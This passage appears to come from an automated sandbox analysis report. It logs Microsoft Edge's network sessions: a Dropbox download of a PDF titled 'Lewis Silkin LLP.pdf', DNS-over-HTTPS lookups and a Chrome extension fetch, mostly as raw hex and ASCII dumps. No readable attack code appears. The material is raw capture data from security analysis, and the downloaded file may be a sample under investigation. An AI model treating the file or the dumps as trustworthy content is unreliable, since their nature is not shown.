                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                              sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                              Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC668INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Content-Type: application/binary
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="Lewis Silkin LLP.pdf"; filename*=UTF-8''Lewis%20Silkin%20LLP.pdf
                                                                                                                                                                                                                                                                                              Etag: 1733684767914485d
                                                                                                                                                                                                                                                                                              Pragma: public
                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                              X-Server-Response-Time: 162
                                                                                                                                                                                                                                                                                              Date: Tue, 10 Dec 2024 17:40:26 GMT
                                                                                                                                                                                                                                                                                              Server: envoy
                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                              Content-Length: 106848
                                                                                                                                                                                                                                                                                              X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                              X-Dropbox-Request-Id: 6e492bb80eae4c39b164070bd18449c5
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC15716INData Raw: 25 50 44 46 2d 31 2e 37 0d 0a 25 b5 b5 b5 b5 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 32 35 20 30 20 52 2f 4d 61 72 6b 49 6e 66 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e 3e 2f 4d 65 74 61 64 61 74 61 20 38 35 20 30 20 52 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e 63 65 73 20 38 36 20 30 20 52 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 32 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 73 2f 43 6f 75 6e 74 20 32 2f 4b 69 64 73 5b 20 33 20 30 20 52 20 32 30 20 30 20 52 5d 20 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 2f 50 61 72 65 6e 74 20
                                                                                                                                                                                                                                                                                              Data Ascii: %PDF-1.7%1 0 obj<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>endobj2 0 obj<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>endobj3 0 obj<</Type/Page/Parent
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC16384INData Raw: 45 18 32 c4 60 66 ce 30 54 e4 7e 84 fe 55 d0 7c 1f d4 fe d7 e1 27 b3 63 96 b3 9d 95 46 7f 85 be 61 fa 96 ad 4f 89 9a 48 d5 bc 1d 38 05 44 90 3a ca ac c7 00 73 82 49 f4 c1 27 f0 ae 3f e1 8d 9d f6 87 ae 5f a9 86 69 74 f9 63 da 24 44 24 31 07 28 c3 d8 a9 3c d6 56 71 af 7e 8c f4 95 48 57 ca 7d 9b 7e f4 1e 9f d7 a3 3d 83 b5 79 07 c5 7b 59 34 bf 13 68 de 23 81 4e 63 c0 72 3d 51 83 0f cc 13 f9 57 af a9 dc a0 e0 8c 8e 86 b8 af 8a 5a 57 f6 8f 82 ae 24 45 06 5b 47 59 d7 3e 83 83 fa 12 7f 0a da ba bd 36 79 b9 65 55 4f 15 1b ec f4 7f 3d 0e c6 da 74 b9 b6 8e 78 ce 63 91 43 a9 f5 04 64 54 b5 c9 fc 38 d5 46 ab e0 9b 17 e0 3c 00 db b2 8e db 38 03 fe f9 db 5d 65 5c 65 cd 14 ce 5a f4 dd 2a 92 a6 fa 3b 05 14 51 54 64 14 51 45 00 14 76 aa 5a ad c4 f6 9a 55 d5 c5 b2 07 9a 28
                                                                                                                                                                                                                                                                                              Data Ascii: E2`f0T~U|'cFaOH8D:sI'?_itc$D$1(<Vq~HW}~=y{Y4h#Ncr=QWZW$E[GY>6yeUO=txcCdT8F<8]e\eZ*;QTdQEvZU(
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC668INData Raw: 14 67 8c 12 4e 96 75 65 7a 7a 49 71 f1 f0 59 4d bd bf 63 83 af ca f1 16 8f 1d 3e e8 96 de d7 e5 4d 7f 3a f4 19 da 18 37 c9 58 78 ad 31 71 1d 03 17 8d 32 c9 ae c6 ca ae 86 4c cf 98 5e 33 bd 6f 52 62 65 2f 1f d3 89 b8 d4 d4 0c a3 ec a2 37 26 36 d6 b8 42 74 98 6b ef 97 73 ef 24 fa 30 d5 52 d9 5c f1 1e 95 4c 91 fd 60 ab d1 05 6b 37 79 75 d2 fd 8c 17 e0 7c d2 85 ee 6e 1f 95 3a 32 37 77 ac e6 e2 e0 ef b8 e1 55 be eb d6 88 57 b5 bd 93 f8 3a f5 16 4a a2 6a cd 2b e7 b6 84 07 13 f8 f7 62 6f 4c e0 31 77 1a 13 e8 4e 96 84 1b 53 8c 71 77 5c 66 8d 8e e9 3a fa d5 5e 26 5d 98 7f f2 ac c7 63 f1 c8 19 75 72 38 6e 62 6c be b5 9b 25 c1 1e 73 48 86 2e 39 7b 50 36 2f b4 50 51 b2 4e c7 93 fb a5 0e e4 7c dd 1d cd 5b ee 61 05 a7 bf b3 7d aa 23 63 d2 d5 bd 2d ae c9 0b 6f 65 9d bf
                                                                                                                                                                                                                                                                                              Data Ascii: gNuezzIqYMc>M:7Xx1q2L^3oRbe/7&6Btks$0R\L`k7yu|n:27wUW:Jj+boL1wNSqw\f:^&]cur8nbl%sH.9{P6/PQN|[a}#c-oe
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC16384INData Raw: 51 18 94 6c 67 a6 be 6f af d1 66 af 6e e5 a2 55 46 bd de e4 4a ec 37 bc b8 7a 54 d9 a2 cd bd 7b 72 32 37 d7 24 99 8d fd 8c c5 23 86 57 b5 d5 2f ea 92 e3 73 2b f6 d0 16 bc 11 4c 34 56 f3 bb 3f 96 83 49 78 8d de e2 42 a3 b7 a4 b0 de c8 76 18 f7 19 b9 71 43 ac dc 13 2c a7 57 61 d1 48 df b0 6b 07 49 a7 b9 22 43 74 e1 5e 47 79 5e 6d 8b 7b 52 a3 c3 f2 bc 72 57 9b 14 7e 5f 3c a6 2e 26 0b 65 d1 ef 64 4b c1 06 83 3d c4 74 41 55 4d 96 cc 6c ce 08 b1 78 6f a2 31 83 b2 bd d9 dc 9b ed cf de 99 7d 3c 5b c9 4e 90 e2 b8 7a bc fc d6 d3 66 bc d4 54 4a 77 1d 64 03 19 de 11 91 58 61 51 cf 5f 75 7a ca c9 be e9 5b 7e a5 77 32 cb 72 66 65 66 71 1d 67 82 71 9d de d5 df 3a c0 3a d0 2a 74 49 d9 f1 2e 53 76 5a 7a 6a 3a d7 39 94 84 46 b2 e9 32 1a 59 bf 38 a4 52 62 91 ca 62 f6 46 66
                                                                                                                                                                                                                                                                                              Data Ascii: QlgofnUFJ7zT{r27$#W/s+L4V?IxBvqC,WaHkI"Ct^Gy^m{RrW~_<.&edK=tAUMlxo1}<[NzfTJwdXaQ_uz[~w2rfefqgq::*tI.SvZzj:9F2Y8RbbFf
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC16117INData Raw: f7 8f f9 69 ff f7 e9 5f 52 2c 56 ca d5 54 17 fe c8 c2 72 fe b5 68 6d 6b ab 7d f5 0f 98 02 f6 af 11 5c 56 a9 d5 4c 41 8f ca 05 b4 ab 70 a0 70 b0 c0 14 7c e0 cf 0b 12 a8 52 a1 5c cd 31 63 03 68 00 ae cd 8a b5 1c 37 7e 32 21 bb 49 e3 77 84 b7 1a 00 92 c5 62 c5 0a 38 a0 46 d3 28 4d 64 b7 29 50 3a 90 46 6b d2 c3 e9 c9 f4 c9 b4 29 6d 83 3d d3 f3 bc 32 6e fc bb ee 04 43 93 be 41 d9 5a d8 aa 6f 3d 84 ef b9 79 2b 1c 1a 12 a5 d2 56 db 81 fb 97 a1 65 84 f1 5a 56 54 bc c8 ee 1d f6 fe 1c 3b 97 fa dc 7f e8 0e 92 e3 22 01 10 f1 92 df e8 ad d3 df d7 5d 0f d6 50 ad 58 60 fa 19 ba 9f 41 14 23 c3 82 74 f8 56 fa c3 25 52 e3 b3 32 f0 f5 00 df a1 f1 14 5c 23 73 f5 96 ad cf a0 1b a9 18 b2 1c d9 0f c3 43 c6 e4 a2 d1 e9 d1 19 d2 98 d6 46 4f cb da c8 fb 64 43 33 26 0e 8f c8 a7 31
                                                                                                                                                                                                                                                                                              Data Ascii: i_R,VTrhmk}\VLApp|R\1ch7~2!Iwb8F(Md)P:Fk)m=2nCAZo=y+VeZVT;"]PX`A#tV%R2\#sCFOdC3&1
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC16384INData Raw: 71 c9 72 29 63 61 a3 4e f7 ca 58 6d ba e2 a5 ab 9f b8 9e cb 59 45 8f dc 9f c0 a3 b9 c1 94 53 f0 cb 3d 3d 15 47 f7 78 c6 ad d1 10 16 36 52 1a c9 c8 23 39 bf d6 ea 30 69 71 07 8c 30 8c 6c b2 2f 9b 1b 91 7d 56 0d 41 5c fa 9a 4e 27 d5 46 05 66 7c 65 05 c7 91 ae 5f 71 f9 97 1a 1c e2 b0 81 1d 6a 0a 1b 64 50 71 8c 38 f0 bd 32 a8 37 1a 58 20 18 04 21 18 b4 f7 2d 2e 9e d2 67 3b 03 29 ca ac 4a 81 54 30 00 e0 d7 6d 94 72 8d c6 ba 2a a8 e6 20 9c be e3 96 a2 68 7d 96 46 01 a2 07 d1 0b 12 8e 2e c0 78 b1 bd fa 09 8c 1a 91 d9 9e 43 0b db 42 f4 00 21 43 2c 18 62 27 af 41 9d d5 10 3a 6e 8b 76 49 5f b8 dc 10 46 aa 1e 21 7e 2f ea ad ae 00 c3 f5 8d 8c 89 2b ef de 98 17 aa 63 ab 57 85 6b 77 d5 58 c1 e7 b6 08 a4 4f 1e 98 39 36 b1 eb b5 93 6b a7 4e bc be 7f 62 77 98 e5 ed 94 56
                                                                                                                                                                                                                                                                                              Data Ascii: qr)caNXmYES==Gx6R#90iq0l/}VA\N'Ff|e_qjdPq827X !-.g;)JT0mr* h}F.xCB!C,b'A:nvI_F!~/+cWkwXO96kNbwV
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC16384INData Raw: 34 34 5d 20 0d 0a 65 6e 64 6f 62 6a 0d 0a 38 32 20 30 20 6f 62 6a 0d 0a 5b 20 32 37 38 5d 20 0d 0a 65 6e 64 6f 62 6a 0d 0a 38 33 20 30 20 6f 62 6a 0d 0a 5b 20 32 32 36 5d 20 0d 0a 65 6e 64 6f 62 6a 0d 0a 38 34 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 4c 65 6e 67 74 68 20 31 39 32 37 32 2f 4c 65 6e 67 74 68 31 20 38 33 31 36 34 3e 3e 0d 0a 73 74 72 65 61 6d 0d 0a 78 9c ec 7d 07 5c 94 57 ba fe 39 df 37 8d 29 cc 0c 32 b4 01 66 c6 01 44 47 c0 82 0a 6a 64 94 62 ef 8e 01 6c 20 a0 68 50 51 b1 c4 a8 21 31 d1 84 68 7a af a6 9a 8d 29 c3 68 22 9a 66 b2 a6 6c 8a e9 65 93 4d 71 37 9b 4d 36 31 6d 37 cd 28 dc e7 7c ef 1c db 6e f2 df dd bb 77 73 73 ff f3 c2 33 cf 73 de 53 be 53 df ef f0 13 7e 32 ce 18 73 e0 43 c7 6a ca 47
                                                                                                                                                                                                                                                                                              Data Ascii: 44] endobj82 0 obj[ 278] endobj83 0 obj[ 226] endobj84 0 obj<</Filter/FlateDecode/Length 19272/Length1 83164>>streamx}\W97)2fDGjdbl hPQ!1hz)h"fleMq7M61m7(|nwss3sSS~2sCjG
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC267INData Raw: f8 ac 53 54 f2 d6 9b 15 3f da 50 9d 7c 2e 4e f3 3d 15 d2 ab 73 d7 6e e2 d2 c6 8e a2 fd 69 0b f6 78 f5 ed c1 5b 38 b0 e0 ac eb b9 2b fb 66 4c 12 0e 6b 36 28 7c 8d e5 c0 3b 3f 1c be d1 74 de ac bc 43 e2 62 17 39 59 ec 42 c3 e6 9f 84 b0 fd 9b d3 f5 27 b7 fa 26 27 88 92 a2 f5 28 ed b0 81 6c c5 17 db 9a 1e 51 40 92 ea 9a 8d d8 9e 34 ed 75 21 fd ab 07 0a c4 9e 02 c2 c3 c7 71 7d 66 d0 16 72 7a 70 e0 86 79 7d e8 d1 e5 95 ef 0a 37 7e cb cf 1b 3a c1 a3 61 d1 37 43 96 90 e1 26 c3 6d c5 6d c8 a0 92 ba 85 4e 1f 3e f2 5e dc b0 d0 dd f0 4b bb fc 0f e6 74 ad 15 48 50 cc e5 ac 75 79 34 e4 ae 1b ff cd e1 b0 53 45 4b ea ec 7e b7 f3 d9 92 19 d3 53 97 46 cf eb b7 ef d1 90 c8 11 a2 ce 8b ee 39 e5 df 38 b9 21 55 16 3a f4 e1 a0 e3 01 61 03 2f 77 79 ca 8b b7 f3 7a 67 19 df c0 c2
                                                                                                                                                                                                                                                                                              Data Ascii: ST?P|.N=snix[8+fLk6(|;?tCb9YB'&'(lQ@4u!q}frzpy}7~:a7C&mmN>^KtHPuy4SEK~SF98!U:a/wyzg
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC8544INData Raw: 1d 4b 08 48 1c 19 42 6c 58 e3 d4 c8 32 a0 b4 fc cb 65 7b 3a 6f eb eb 54 26 bf d8 7a eb 67 67 eb 34 2d 5b e9 5b 35 62 d4 8d 76 e5 bd a2 12 5a f7 fd ce 67 e4 cf 6f 3b 6f 38 32 89 27 5c b4 6a e6 2f 61 da 81 7d 3c 9e 76 d9 ea d5 e2 cd e0 fc 4b d1 1b 84 e1 75 ee 26 8c 9f a0 71 1e b3 fe cc 45 e5 5a e1 05 c1 98 b0 77 b7 d3 56 ae 39 b7 78 a2 f5 51 ff e3 d7 fc 44 1d 16 0e b2 4f 7c b3 f3 85 de f9 4b f1 b9 21 5d 0f 2e 90 5d 59 39 e4 a8 5b 16 e7 89 a7 62 77 95 6d d9 88 3e 5b 4f da 46 ba f6 9b 32 ee 6a b6 57 72 ee b1 79 0d 1b f4 ef f7 8d ac cc e1 d9 77 69 97 0e ec 55 e7 df bc b8 2d db e3 f9 e2 62 a7 c7 64 b1 d3 23 a3 79 f9 7c ae b8 d8 e9 1a b4 5d ae 71 36 75 3a 06 4d 87 79 5c fe 87 67 d3 62 6e aa a5 8d c1 9d 8e 70 3c 2d e6 86 83 6d bb 42 47 47 88 67 96 f4 a8 0c 6b 3e
                                                                                                                                                                                                                                                                                              Data Ascii: KHBlX2e{:oT&zgg4-[[5bvZgo;o82'\j/a}<vKu&qEZwV9xQDO|K!].]Y9[bwm>[OF2jWrywiU-bd#y|]q6u:My\gbnp<-mBGGgk>


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              9192.168.2.549738162.159.61.34437552C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:26 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:26 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                              Date: Tue, 10 Dec 2024 17:40:26 GMT
                                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                                                                                              CF-RAY: 8eff05240f634316-EWR
                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1f 00 04 8e fb 28 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              10192.168.2.549735172.217.19.2254437552C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:26 UTC594OUTGET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                              Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                              Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              Content-Length: 138356
                                                                                                                                                                                                                                                                                              X-GUploader-UploadID: AFiumC4J6TCUHaB4vHZh0xUuNyuZTRP74OTuNvyhfX-3NnOS1BLi6LlEqdKyjB_ciY1UI5FxAAbinHU
                                                                                                                                                                                                                                                                                              X-Goog-Hash: crc32c=ld9IFg==
                                                                                                                                                                                                                                                                                              Server: UploadServer
                                                                                                                                                                                                                                                                                              Date: Tue, 10 Dec 2024 16:45:00 GMT
                                                                                                                                                                                                                                                                                              Expires: Wed, 10 Dec 2025 16:45:00 GMT
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                              Age: 3327
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 19 Nov 2024 16:44:49 GMT
                                                                                                                                                                                                                                                                                              ETag: 2373c8b9_cba0b209_e851cacf_d4df989e_81c52a41
                                                                                                                                                                                                                                                                                              Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC821INData Raw: 43 72 32 34 03 00 00 00 e0 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                                              Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC1390INData Raw: 5f e7 71 3a 5f 86 5f 7f f9 35 7d d5 75 53 5c 9b ff 18 eb af ff 78 3f ab fa d7 9f 7e 5d cf 1f 43 2d ff b3 ba 0c 53 3d 4c bf fe f2 f7 5f 63 f1 50 97 42 ea cf d7 8f b0 2d 4d db 10 dc 36 32 b3 69 2a b3 51 d5 e3 f8 c4 ad eb 39 ef e7 ef dc 9c de 2b 53 3d 89 f4 f8 84 0e 2f 36 3a df cf c2 57 83 c8 90 71 6c 2f 67 fd f9 26 6a a9 79 fc f9 7b af ae 22 8b ce b1 9a fe 7c 1c dc 46 fa 1f e7 f8 7c 9c a3 f6 e3 56 f9 f6 f0 f3 99 aa 77 be 25 74 2e 79 86 2e 3f df 17 26 e2 e2 61 cc 9c 7f 3c d2 6e c2 88 c1 89 f6 53 2b 7c d4 17 3d 05 72 61 c7 0a 84 08 01 b1 27 7d f8 28 82 70 57 fb c2 16 8f d0 39 05 d7 73 e5 43 a3 d8 1f 9f 8e ca b9 96 26 6a 4a 9f 2d 27 13 f6 27 13 a8 ca 42 8d 30 f5 75 3f 2e a5 b9 3b 9f f6 e1 a3 34 9d 7f cf f3 e7 d9 c2 b9 f0 d4 c0 ac e6 90 42 86 4e 5c 7c a7 3d 83
                                                                                                                                                                                                                                                                                              Data Ascii: _q:__5}uS\x?~]C-S=L_cPB-M62i*Q9+S=/6:Wql/g&jy{"|F|Vw%t.y.?&a<nS+|=ra'}(pW9sC&jJ-''B0u?.;4BN\|=
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC1390INData Raw: fb ee 81 60 65 eb 98 45 ab ec b5 f7 df 38 3e ce 17 36 8b 4c d7 7b 85 4d 64 18 16 65 b0 90 1e f2 cb 03 4c 8a 00 e1 48 79 96 ec 9b 3d f6 a0 d6 80 10 57 0f 10 60 43 7e af 8e 3f 1c b7 7a ee 1d 59 c2 29 1a 94 12 c6 ec 9e 28 ba 47 74 ea a9 92 fb f2 20 bd f4 20 c3 8a 8a 04 03 ec 56 83 d6 68 aa f5 88 d1 39 0a d6 d7 be fa 7f 68 70 d5 e2 31 37 1a 25 03 f1 55 98 2a 4b bd 68 22 81 eb 25 ad 18 84 19 e6 b8 d7 a1 60 b9 67 e1 89 9c f6 e2 ad 52 d0 c5 a6 dc ad e7 9e dc ca 7f d2 3e 77 87 7d e1 a1 a5 e9 a4 17 9a 04 c0 1e 05 42 14 c6 78 22 8b d6 00 1f f3 28 78 31 13 f3 7e 67 01 4e 72 8a 0f 75 ff 71 5f e5 6f 6d cd bd d1 43 0a 76 99 35 be 4a e5 2d 31 6c 3a 02 10 c5 56 13 ea 1e 23 15 1d 58 74 af 43 75 3d f0 13 03 bc 22 a2 fc ca 82 66 b9 ee fd 2e c5 46 f6 b8 53 d7 bc 55 5e 3d b8
                                                                                                                                                                                                                                                                                              Data Ascii: `eE8>6L{MdeLHy=W`C~?zY)(Gt Vh9hp17%U*Kh"%`gR>w}Bx"(x1~gNruq_omCv5J-1l:V#XtCu="f.FSU^=
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC1390INData Raw: 36 b6 c2 7d dd cf 6f 71 6a 3c aa 40 7e 15 06 ce 18 81 87 14 8e b0 58 44 27 7a dd 77 ac b1 b7 dc 66 ab cf 89 e9 ce a6 3c ec 05 3f 02 02 d8 27 ea 46 4f 70 bb e1 2d 44 84 4e 09 f6 ed 1b e9 1b c5 3d 68 a6 0c d9 75 0f 3f b1 8e cd 35 f6 95 bf 91 bd 1a 69 d1 42 51 b5 ee b9 e2 ce 89 50 6c 26 16 de 89 5e bc e6 c4 fd 26 da f5 e3 ce 69 10 77 1e cc c8 01 e9 9e 41 6a 55 a0 38 bc ac b1 bf 6b be 7b ba 51 77 aa c0 9b 05 fc b0 44 37 6a e6 e1 c0 0e 78 4a 7b 14 13 4f eb 10 ed ee 3f fb 8d c4 1f af b9 25 7e f2 af cb 87 f0 11 f9 c7 c7 ff c1 df c8 80 4b b7 c6 3f 03 ce 51 66 ae c1 bd e9 35 31 9c a0 54 88 27 0b eb 52 98 2c 14 76 36 e7 d3 53 74 70 f3 94 48 50 51 74 c1 6a 6c c5 02 57 75 bf ea 37 d6 5c 85 75 ff 1a de 92 f6 c3 8e 3c db 2b f4 fc 0a bf 49 4b a8 ce 14 7e 00 ce c6 ac 26
                                                                                                                                                                                                                                                                                              Data Ascii: 6}oqj<@~XD'zwf<?'FOp-DN=hu?5iBQPl&^&iwAjU8k{QwD7jxJ{O?%~K?Qf51T'R,v6StpHPQtjlWu7\u<+IK~&
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC1390INData Raw: 98 a3 4a ae e7 0e 9d 1f 06 63 15 24 ff cb b8 61 7b a2 4e 58 74 c0 4c 09 86 ba 97 48 e8 03 c4 a9 0f ee 35 65 bd 60 e1 21 a1 18 44 a6 bd 68 e1 33 23 9a dc 91 a1 d2 1c 38 bf d3 98 ca 64 0f d9 ab 56 8f 6d 95 56 f8 a5 e3 ec 3d ef d5 2d b3 5c 3d e6 ff 3a fe 0d 19 c0 60 d4 b8 23 8f b9 88 da a3 ee df 88 f6 ec a7 9c 21 9f 2e 21 cc 81 f2 75 fd ed 12 f6 f3 fe 52 6a 9f db f0 a2 fb e9 a7 81 d4 f7 eb f5 58 53 9e 25 3f f7 32 7e 98 ff 3b 96 ae c7 fe 9f e7 2d df ff f0 9c e5 bf be 3b 4a 9f 4d 99 a9 ba 7f 9d 95 6c 74 8c da b7 42 c7 85 e0 d3 bd e4 8e ca 4d fb 56 f6 ea 5a f6 b6 f6 9f f3 77 e9 37 5f 85 df 9d ff fb bb 96 8e e7 01 8d 3f b9 f3 73 16 f3 d4 7e 18 a7 d6 fb f9 ff 5d c7 97 a1 e3 ee bb 84 8e a9 59 2c 05 d7 fa d6 5e e6 f7 e4 df 87 46 8b e9 f6 55 5f 7f fd e5 af 7f ff d5
